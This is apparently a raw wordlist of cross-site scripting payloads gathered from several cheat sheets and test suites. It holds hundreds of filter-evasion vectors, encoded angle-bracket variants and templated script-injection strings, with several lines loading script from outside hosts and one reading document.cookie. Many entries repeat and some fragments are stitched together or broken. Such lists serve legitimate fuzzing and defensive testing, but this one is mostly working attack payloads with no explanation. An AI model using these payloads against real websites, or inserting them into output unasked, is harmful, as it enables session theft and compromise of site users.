<xmp onmouseover="alert(1)">test</xmp>
<xmp onmouseup="alert(1)">test</xmp>
' onmouseover=alert(/XSS/)
<%<!--'%><script>alert(1);</script -->
<iframe/src \/\/onload = prompt(1)
<iframe/onreadystatechange=alert(1)
<svg/onload=alert(1)
<svg><script ?>alert(1)
<img src=`xx:xx`onerror=alert(1)>
<script>+-+-1-+-+alert(1)</script>
<body/onload=&lt;!--&gt;&#10alert(1)>
<script x> alert(1) </script 1=2
<--`<img/src=` onerror=alert(1)> --!>
"><img src=x onerror=prompt(1);>
<SCRIPT>alert('XSS');</SCRIPT>
'';!--"<XSS>=&{()}
<IMG SRC="javascript:alert('XSS');">
<IMG SRC=javascript:alert('XSS')>
<IMG SRC=JaVaScRiPt:alert('XSS')>
<IMG SRC="jav	ascript:alert('XSS');">
<IMG SRC="javascript:alert('XSS')"
<SCRIPT>a=/XSS/
\";alert('XSS');//
<BODY ONLOAD=alert('XSS')>
<IMG DYNSRC="javascript:alert('XSS')">
<IMG LOWSRC="javascript:alert('XSS')">
<BR SIZE="&{alert('XSS')}">
<IMG SRC='vbscript:msgbox("XSS")'>
<IMG SRC="mocha:[code]">
<IMG SRC="livescript:[code]">
exp/*<XSS STYLE='no\xss:noxss("*//*");
getURL("javascript:alert('XSS')")
a="get";
<HTML><BODY>
<? echo('<SCR)';
<svg%0Aonload=%09((pro\u006dpt))()//
<sCriPt x>(((confirm)))``</scRipt x>
<deTAiLs/open/oNtoGGle=confirm()>
<sVg oNloaD=write()>
<A href=javas%26#99;ript:alert(1)>click
<svG/x=">"/oNloaD=confirm()//
<--`<iMG/srC=` onerror=confirm``> --!>
<SVg </onlOad ="1> (_=prompt,_(1)) "">
<!--><scRipT src=//14.rs>
<sCriPt/src=//14.rs?
<sCRIpt x=">" src=//15.rs></script>
<D3/OnMouSEenTer=[2].find(confirm)>z
<D3"<"/OncLick="1>[confirm``]"<">z
<Z oncut=alert()>x
<iFrAMe/src \/\/onload = prompt(1)
>>> vectors()
<body>Hello</body>
</html>//["'`-->]]>]</div>
<div id="62"><!-- IE 6-8 -->
<!-- IE 6-9 -->
<img src="javascript:alert(2)">
<div id="66"><?xml version="1.0"?>
<root/>//["'`-->]]>]</div>
</svg>//["'`-->]]>]</div>
</svg>//["'`-->]]>]</div>
</svg>//["'`-->]]>]</div>
<div id="90"><!-- Up to Opera 10.63 -->
<!-- Up to Opera 12.x -->
<div id="91">[A]
<? foo="><script>alert(91)</script>">
<! foo="><script>alert(91)</script>">
</ foo="><script>alert(91)</script>">
</svg>//["'`-->]]>]</div>
</svg>//["'`-->]]>]</div>
<div id="97"><!-- IE 5-9 -->
<script>d.innerHTML+='';</script>
<!-- IE 10 in IE5-9 Standards mode -->
<div id="99">XXX<style>
<!--
--><!--*{color:red}   /* all UA */
</style>//["'`-->]]>]</div>
</svg>//["'`-->]]>]</div>
<!-- IE 5-9 standards mode -->
</svg>//["'`-->]]>]</div>
</svg>//["'`-->]]>]</div>
<div id="113"><div id="x">XXX</div>
<div id="116"><div id="x">x</div>
<xml:namespace prefix="t">
</a>//["'`-->]]>]</div>
xmlns:svg="http://www.w3.org/2000/svg">
<body style="background:gray">
</html>//["'`-->]]>]</div>
<div id="125"><?xml version="1.0"?>
<!DOCTYPE doc [
<handler id="y">alert(127)</handler>
</svg>//["'`-->]]>]</div>
<div id="129"><svg>
</svg>//["'`-->]]>]</div>
<math>
</math>//["'`-->]]>]</div>
<div id="132"><!doctype html>
<form>
<br>
<input name="secret" type="password">
</form>
<!-- injection --><svg height="50px">
</image>
</svg>//["'`-->]]>]</div>
<div id="134"><xmp>
<%
</xmp>
*{color:red}</style>//["'`-->]]>]</div>
<template match="/">
</template>
</stylesheet>//["'`-->]]>]</div>
<input name="username" value="admin" />
<input type="submit">
</form>//["'`-->]]>]</div>
<div id="137"><svg>
<circle r="400"></circle>
</a>//["'`-->]]>]</div>
<marguee/onstart=alert(1)>
<svg onload=(alert)(1)>
<script>$=1,alert($)</script>
<div style=xss:expression(alert(1))>
<div style=xss:expression(1)-alert(1)>
<div style=xss:expressio\6e(alert(1))>
<div style=xss:expressio\6e(alert(1))>
<div style=content:url(%(svg)s)></div>
<x style="behavior:url(%(sct)s)">
<script>%(payload)s</script>
<script src=%(jscript)s></script>
<script>javascript:alert(1)</script>
<SCRIPT SRC=%(jscript)s?<B>
<BODY ONLOAD=javascript:alert(1)>
<SCRIPT/SRC="%(jscript)s"></SCRIPT>
<<SCRIPT>%(payload)s//<</SCRIPT>
<iframe src=%(scriptlet)s <
<BR SIZE="&{javascript:alert(1)}">
<LAYER SRC="%(scriptlet)s"></LAYER>
<STYLE>@import'%(css)s';</STYLE>
<XSS STYLE="behavior: url(%(htc)s);">
<SCRIPT SRC="%(jpg)s"></SCRIPT>
<STYLE>@import'%(css)s';</STYLE>
<embed code=%(scriptlet)s></embed>
<embed src=%(jscript)s></embed>
<IMG SRC=&{javascript:alert(1);};>
'';!--"<XSS>=&{()}
<IMG SRC="javascript:alert('XSS');">
<IMG SRC=javascript:alert('XSS')>
<IMG SRC=JaVaScRiPt:alert('XSS')>
<IMG SRC=javascript:alert("XSS")>
<IMG SRC=# onmouseover="alert('xxs')">
<IMG SRC= onmouseover="alert('xxs')">
<IMG onmouseover="alert('xxs')">
<IMG SRC="jav ascript:alert('XSS');">
<<SCRIPT>alert("XSS");//<</SCRIPT>
<SCRIPT SRC=//ha.ckers.org/.j>
<IMG SRC="javascript:alert('XSS')"
\";alert('XSS');//
</TITLE><SCRIPT>alert("XSS");</SCRIPT>
<IMG DYNSRC="javascript:alert('XSS')">
<IMG LOWSRC="javascript:alert('XSS')">
<IMG SRC='vbscript:msgbox("XSS")'>
<IMG SRC="livescript:[code]">
<BODY ONLOAD=alert('XSS')>
<BR SIZE="&{alert('XSS')}">
<XSS STYLE="behavior: url(xss.htc);">
¼script¾alert(¢XSS¢)¼/script¾
<A HREF="http://66.102.7.147/">XSS</A>
<A HREF="http://1113982867/">XSS</A>
<script ~~~>alert(0%0)</script ~~~>
<iframe// src=javaSCRIPT&colon;alert(1)
<%<!--'%><script>alert(1);</script -->
<iframe/src \/\/onload = prompt(1)
<iframe/onreadystatechange=alert(1)
<svg/onload=alert(1)
<svg><script ?>alert(1)
<img src=`xx:xx`onerror=alert(1)>
<script>+-+-1-+-+alert(1)</script>
<body/onload=&lt;!--&gt;&#10alert(1)>
<script x> alert(1) </script 1=2
<--`<img/src=` onerror=alert(1)> --!>
\x3Cscript>javascript:alert(1)</script>
<script>javascript:alert(1)</script\x0D
<script>javascript:alert(1)</script\x0A
<script>javascript:alert(1)</script\x0B
<frameset onload=javascript:alert(1)>
<b <script>alert(1)</script>0
<embed src="javascript:alert(1)">
<img src="javascript:alert(1)">
<image src="javascript:alert(1)">
<script src="javascript:alert(1)">
<img \x00src=x onerror="alert(1)">
<script src="/\%(jscript)s"></script>
<script src="\\%(jscript)s"></script>
<style>*[{}@import'%(css)s?]</style>X
' onmouseover=alert(/Black.Spook/)
<%<!--'%><script>alert(1);</script -->
<iframe/src \/\/onload = prompt(1)
<iframe/onreadystatechange=alert(1)
<svg/onload=alert(1)
<svg><script ?>alert(1)
<img src=`xx:xx`onerror=alert(1)>
<script>+-+-1-+-+alert(1)</script>
<body/onload=&lt;!--&gt;&#10alert(1)>
<script x> alert(1) </script 1=2
<--`<img/src=` onerror=alert(1)> --!>
"><img src=x onerror=prompt(1);>

<head>
<style type="text/css">
</style>
</head>
<body>Hello</body>
</html>//["'`-->]]>]</div>

<div id="62"><!-- IE 6-8 -->

<!-- IE 6-9 -->

<img src="javascript:alert(2)">
<div id="66"><?xml version="1.0"?>
<root/>//["'`-->]]>]</div>

<div id="67"><!DOCTYPE x [
 onerror CDATA "alert(67)"
 onload CDATA "alert(2)">
]><img />//["'`-->]]>]</div>

</doc>//["'`-->]]>]</div>
</svg>//["'`-->]]>]</div>





</svg>//["'`-->]]>]</div>

</svg>//["'`-->]]>]</div>

<div id="90"><!-- Up to Opera 10.63 -->


<!-- Up to Opera 12.x -->

<div id="91">[A]
<? foo="><script>alert(91)</script>">
<! foo="><script>alert(91)</script>">
</ foo="><script>alert(91)</script>">
[B]
[C]
[D]
</svg>//["'`-->]]>]</div>

<feImage>
</feImage>
</svg>//["'`-->]]>]</div>


<div id="97"><!-- IE 5-9 -->
<script>d.innerHTML+='';</script>

<!-- IE 10 in IE5-9 Standards mode -->


<div id="99">XXX<style>


<!--
--><!--*{color:red}   /* all UA */


</style>//["'`-->]]>]</div>
</svg>//["'`-->]]>]</div>

<!-- IE 5-9 standards mode -->

</svg>//["'`-->]]>]</div>

</svg>//["'`-->]]>]</div>
<div id="113"><div id="x">XXX</div>
<style>

#x{font-family:foo[bar;color:green;}

#y];color:red;{}

</style>//["'`-->]]>]</div>

<div id="116"><div id="x">x</div>
<xml:namespace prefix="t">

</a>//["'`-->]]>]</div>

    <h1>Drop me</h1>
</div>




<div id="120"><script>
function makePopups(){
    for (i=1;i<6;i++) {
    }
}
</script>

<body>

xmlns:svg="http://www.w3.org/2000/svg">
<body style="background:gray">
<svg:svg>
</svg:mask>
</svg:svg>
</body>
</html>//["'`-->]]>]</div>

<script>
$("span.foo").click(function() {
alert('foo');
$("a.bar").click();
});
$("a.bar").click(function() {
alert('bar');
location="http://html5sec.org";
});
</script>//["'`-->]]>]</div>


<div id="125"><?xml version="1.0"?>
<!DOCTYPE doc [
<!ATTLIST xsl:stylesheet
  id    ID    #REQUIRED>]>
        <xsl:template match="/">
        </xsl:template>
    </xsl:stylesheet>
    <circle fill="red" r="40"></circle>
</svg>//["'`-->]]>]</div>


<handler id="y">alert(127)</handler>
</svg>//["'`-->]]>]</div>
<div id="129"><svg>
<!--
Same effect with
<image filter='...'>
-->
</svg>//["'`-->]]>]</div>


<math>
<!-- up to FF 13 -->

<!-- FF 14+ -->
</math>//["'`-->]]>]</div>

<br/><hr/>
<br/><hr/>
<br/><hr/>
<br/><hr/>
<br/><hr/>

<div id="132"><!doctype html>
<form>
<br>
<input name="secret" type="password">
</form>
<!-- injection --><svg height="50px">
</image>
</svg>//["'`-->]]>]</div>
<div id="134"><xmp>
<%
</xmp>

<script>
x='<%'
</script> %>/
alert(2)
</script>

XXX
<style>
*['<!--']{}
</style>
-->{}
*{color:red}</style>//["'`-->]]>]</div>

<template match="/">
</template>
</stylesheet>//["'`-->]]>]</div>
<input name="username" value="admin" />
<input type="submit">
</form>//["'`-->]]>]</div>
<div id="137"><svg>
<circle r="400"></circle>
</a>//["'`-->]]>]</div>
alert`1`
alert&lpar;1&rpar;
alert&#x28;1&#x29
alert&#40;1&#41
(alert)(1)
a=alert,a(1)
[1].find(alert)
top["al"+"ert"](1)
top[/al/.source+/ert/.source](1)
al\u0065rt(1)
top['al\145rt'](1)
top['al\x65rt'](1)
top[8680439..toString(30)](1)
navigator.vibrate(500)
eval(URL.slice(-8))>#alert(1)
eval(location.hash.slice(1)>#alert(1)
<svg onload=alert(1)>
"><svg onload=alert(1)//
"onmouseover=alert(1)//
"autofocus/onfocus=alert(1)//
'-alert(1)-'
'-alert(1)//
\'-alert(1)//
</script><svg onload=alert(1)>
<x onclick=alert(1)>click this!
<x oncopy=alert(1)>copy this!
<x oncut=alert(1)>copy this!
<x ondrag=alert(1)>drag this!
<x onmousedown=alert(1)>click this!
<x onmousemove=alert(1)>hover this!
<x onmouseout=alert(1)>hover this!
<x onmouseover=alert(1)>hover this!
<x onmouseup=alert(1)>click this!
<script>alert(1)//
<script>alert(1)<!–
<script src=//brutelogic.com.br/1.js>
<script src=//3334957647/1>
%3Cx onxxx=alert(1)
<%78 onxxx=1
<x %6Fnxxx=1
<x o%6Exxx=1
<x on%78xx=1
<x onxxx%3D1
<X onxxx=1
<x OnXxx=1
<X OnXxx=1
<x onxxx=1 onxxx=1
<x/onxxx=1
<x%09onxxx=1
<x%0Aonxxx=1
<x%0Conxxx=1
<x%0Donxxx=1
<x%2Fonxxx=1
<x 1='1'onxxx=1
<x 1="1"onxxx=1
<x </onxxx=1
<x 1=">" onxxx=1
<http://onxxx%3D1/
<x onxxx=alert(1) 1='
'onload=alert(1)><svg/1='
'>alert(1)</script><script/1='
*/alert(1)</script><script>/*
*/alert(1)">'onload="/*<svg/1='
`-alert(1)">'onload="`<svg/1='
*/</script>'>alert(1)/*<script/1='
<script>alert(1)</script>
<script src=javascript:alert(1)>
<iframe src=javascript:alert(1)>
<embed src=javascript:alert(1)>
<a href=javascript:alert(1)>click
<object data=javascript:alert(1)>
<html ontouchstart=alert(1)>
<html ontouchend=alert(1)>
<html ontouchmove=alert(1)>
<html ontouchcancel=alert(1)>
<body onorientationchange=alert(1)>
"><img src=1 onerror=alert(1)>.gif
<script src="data:&comma;alert(1)//
"><script src=data:&comma;alert(1)//
<base href=//0>
<body onload=alert(1)>
<body onpageshow=alert(1)>
<body onfocus=alert(1)>
<body onresize=alert(1)>press F12!
<body onhelp=alert(1)>press F1! (MSIE)
<marquee onstart=alert(1)>
<audio src onloadstart=alert(1)>
<video onloadstart=alert(1)><source>
<input autofocus onblur=alert(1)>
<keygen autofocus onfocus=alert(1)>
<SCRIPT>alert('XSS');</SCRIPT>
'';!--"<XSS>=&{()}
<IMG SRC="javascript:alert('XSS');">
<IMG SRC=javascript:alert('XSS')>
<IMG SRC=JaVaScRiPt:alert('XSS')>
<IMG SRC="jav	ascript:alert('XSS');">
<IMG SRC="javascript:alert('XSS')"
<SCRIPT>a=/XSS/
\";alert('XSS');//
<BODY ONLOAD=alert('XSS')>
<IMG DYNSRC="javascript:alert('XSS')">
<IMG LOWSRC="javascript:alert('XSS')">
<BR SIZE="&{alert('XSS')}">
<IMG SRC='vbscript:msgbox("XSS")'>
<IMG SRC="mocha:[code]">
<IMG SRC="livescript:[code]">
exp/*<XSS STYLE='no\xss:noxss("*//*");
getURL("javascript:alert('XSS')")
a="get";
<HTML><BODY>
<? echo('<SCR)';
%3Cimg/src=%3Dx+onload=alert(2)%3D
48e71%3balert(1)//503466e3
';confirm('XSS')//1491b2as
a29b1%3balert(888)//a62b7156d82
<scr&#x9ipt>alert('XSS')</scr&#x9ipt>
"onmouseover%3dprompt(941634) 
" onerror=alert()1 a="
style=xss:expression(alert(1))
<input type=text value=“XSS”>
	A” autofocus onfocus=alert(“XSS”)//
<a href="javascript:alert(1)">ssss</a>
<%00script>alert(‘XSS’)<%00/script>
<%script>alert(‘XSS’)<%/script>
'';!--"<XSS>=&{()}
<IMG SRC="javascript:alert('XSS');">
<IMG SRC=javascript:alert('XSS')>
<IMG SRC=JaVaScRiPt:alert('XSS')>
<IMG SRC="jav	ascript:alert('XSS');">
<<SCRIPT>alert("XSS");//<</SCRIPT>
<SCRIPT SRC=//ha.ckers.org/.j>
<IMG SRC="javascript:alert('XSS')"
<SCRIPT>a=/XSS/
alert(a.source)</SCRIPT>
\";alert('XSS');//
</TITLE><SCRIPT>alert("XSS");</SCRIPT>
<BODY ONLOAD=alert('XSS')>
<IMG DYNSRC="javascript:alert('XSS')">
<IMG LOWSRC="javascript:alert('XSS')">
<BR SIZE="&{alert('XSS')}">
<XSS STYLE="behavior: url(xss.htc);">
<IMG SRC='vbscript:msgbox("XSS")'>
¼script¾alert(¢XSS¢)¼/script¾
exp/*<A STYLE='no\xss:noxss("*//*");
<!--[if gte IE 4]>
<SCRIPT>alert('XSS');</SCRIPT>
<![endif]-->
a="get";
b="URL(\"";
c="javascript:";
d="alert('XSS');\")";
eval(a+b+c+d);
<HTML xmlns:xss>
  <xss:xss>XSS</xss:xss>
</HTML>
<XML SRC="xsstest.xml" ID=I></XML>
<HTML><BODY>
</BODY></HTML>
<? echo('<SCR)';
echo('IPT>alert("XSS")</SCRIPT>'); ?>
<
%3C
&lt
&lt;
&LT
&LT;
&#60
&#060
&#0060
&#00060
&#000060
&#0000060
&#60;
&#060;
&#0060;
&#00060;
&#000060;
&#0000060;
&#x3c
&#x03c
&#x003c
&#x0003c
&#x00003c
&#x000003c
&#x3c;
&#x03c;
&#x003c;
&#x0003c;
&#x00003c;
&#x000003c;
&#X3c
&#X03c
&#X003c
&#X0003c
&#X00003c
&#X000003c
&#X3c;
&#X03c;
&#X003c;
&#X0003c;
&#X00003c;
&#X000003c;
&#x3C
&#x03C
&#x003C
&#x0003C
&#x00003C
&#x000003C
&#x3C;
&#x03C;
&#x003C;
&#x0003C;
&#x00003C;
&#x000003C;
&#X3C
&#X03C
&#X003C
&#X0003C
&#X00003C
&#X000003C
&#X3C;
&#X03C;
&#X003C;
&#X0003C;
&#X00003C;
&#X000003C;
\x3c
\x3C
\u003c
\u003C
#Google.com:
#Blogger.com:
#Yandex:
#VK.com:
#Marketo.com
#AlibabaGroup:
#Uber.com:
#AOL/Yahoo
#Twitter.com:
#Others:
#GoogleAPI's
\x3Cscript>javascript:alert(1)</script>
<script>javascript:alert(1)</script\x0D
<script>javascript:alert(1)</script\x0A
<script>javascript:alert(1)</script\x0B
<frameset onload=javascript:alert(1)>
<b <script>alert(1)</script>0
<embed src="javascript:alert(1)">
<img src="javascript:alert(1)">
<image src="javascript:alert(1)">
<script src="javascript:alert(1)">
<img \x00src=x onerror="alert(1)">
<script src="/\%(jscript)s"></script>
<script src="\\%(jscript)s"></script>
<style>*[{}@import'%(css)s?]</style>X
<div style=content:url(%(svg)s)></div>
<x style="behavior:url(%(sct)s)">
<script>%(payload)s</script>
<script src=%(jscript)s></script>
<script>javascript:alert(1)</script>
<SCRIPT SRC=%(jscript)s?<B>
<BODY ONLOAD=javascript:alert(1)>
<SCRIPT/SRC="%(jscript)s"></SCRIPT>
<<SCRIPT>%(payload)s//<</SCRIPT>
<iframe src=%(scriptlet)s <
<BR SIZE="&{javascript:alert(1)}">
<LAYER SRC="%(scriptlet)s"></LAYER>
<STYLE>@import'%(css)s';</STYLE>
<XSS STYLE="behavior: url(%(htc)s);">
<SCRIPT SRC="%(jpg)s"></SCRIPT>
<STYLE>@import'%(css)s';</STYLE>
<embed code=%(scriptlet)s></embed>
<embed src=%(jscript)s></embed>
<IMG SRC=&{javascript:alert(1);};>
'';!--"<XSS>=&{()}
<IMG SRC="javascript:alert('XSS');">
<IMG SRC=javascript:alert('XSS')>
<IMG SRC=JaVaScRiPt:alert('XSS')>
<IMG SRC=javascript:alert("XSS")>
<IMG SRC=# onmouseover="alert('xxs')">
<IMG SRC= onmouseover="alert('xxs')">
<IMG onmouseover="alert('xxs')">
<IMG SRC="jav	ascript:alert('XSS');">
<<SCRIPT>alert("XSS");//<</SCRIPT>
<SCRIPT SRC=//ha.ckers.org/.j>
<IMG SRC="javascript:alert('XSS')"
\";alert('XSS');//
</TITLE><SCRIPT>alert("XSS");</SCRIPT>
<IMG DYNSRC="javascript:alert('XSS')">
<IMG LOWSRC="javascript:alert('XSS')">
<IMG SRC='vbscript:msgbox("XSS")'>
<IMG SRC="livescript:[code]">
<BODY ONLOAD=alert('XSS')>
<BR SIZE="&{alert('XSS')}">
<XSS STYLE="behavior: url(xss.htc);">
¼script¾alert(¢XSS¢)¼/script¾
<A HREF="http://66.102.7.147/">XSS</A>
<A HREF="http://1113982867/">XSS</A>
<script ~~~>alert(0%0)</script ~~~>
<%<!--'%><script>alert(1);</script -->
<iframe/src \/\/onload = prompt(1)
<iframe/onreadystatechange=alert(1)
<svg/onload=alert(1)
<svg><script ?>alert(1)
<img src=`xx:xx`onerror=alert(1)>
<script>+-+-1-+-+alert(1)</script>
<body/onload=&lt;!--&gt;&#10alert(1)>
<script x> alert(1) </script 1=2
<--`<img/src=` onerror=alert(1)> --!>
javascript:alert(1)
<svg/onload=alert(1)>
<img onload=alert(1)>
<img src=x onerror=prompt(1)>
 onmouseover="document.cookie=true;">
alert(1)>
<h1>INJECTX</h1>
<svg><script>/<@/>alert(1)</script>
<svg/onload=alert(/INJECTX/)>
<iframe/onload=alert(/INJECTX/)>
<svg/onload=alert`INJECTX`>
<svg/onload=alert(/INJECTX/)>
<svg/onload=alert(`INJECTX`)>
}alert(/INJECTX/);{//
<h1/onclick=alert(1)>a
<svg/onload=alert(/INJECTX/)>
<p/onclick=alert(/INJECTX/)>a
<svg/onload=alert`INJECTX`>
<svg/onload=alert(/INJECTX/)>
<svg/onload=alert(`INJECTX`)>
<input autofocus onfocus=alert(1)>
<select autofocus onfocus=alert(1)>
<textarea autofocus onfocus=alert(1)>
<keygen autofocus onfocus=alert(1)>
<svg onload=(alert)(1) >
<script>$=1,alert($)</script>
<img/src='x'onerror=alert(1)>
<marguee/onstart=alert(1)>
<script>alert(1)
<script>alert(1)<!--INJECTX
#getURL,javascript:alert(1)",
#goto,javascript:alert(1)",	
?javascript:alert(1)",
?alert(1)",
?getURL(javascript:alert(1))",
?getURL,javascript:alert(1)",
?goto,javascript:alert(1)",		
?clickTAG=javascript:alert(1)",
?url=javascript:alert(1)",
?TargetAS=javascript:alert(1)",
?onend=javascript:alert(1)//",
?URI=javascript:alert(1)",
?callback=javascript:alert(1)",
?getURLValue=javascript:alert(1)",
?goto=javascript:alert(1)",
?pg=javascript:alert(1)",
?page=javascript:alert(1)"
?playerready=alert(document.cookie)
"><script src=data:&comma;alert(1)//
<base href=//0>
"><svg onload=alert(1)//
"onmouseover=alert(1)//
"autofocus/onfocus=alert(1)//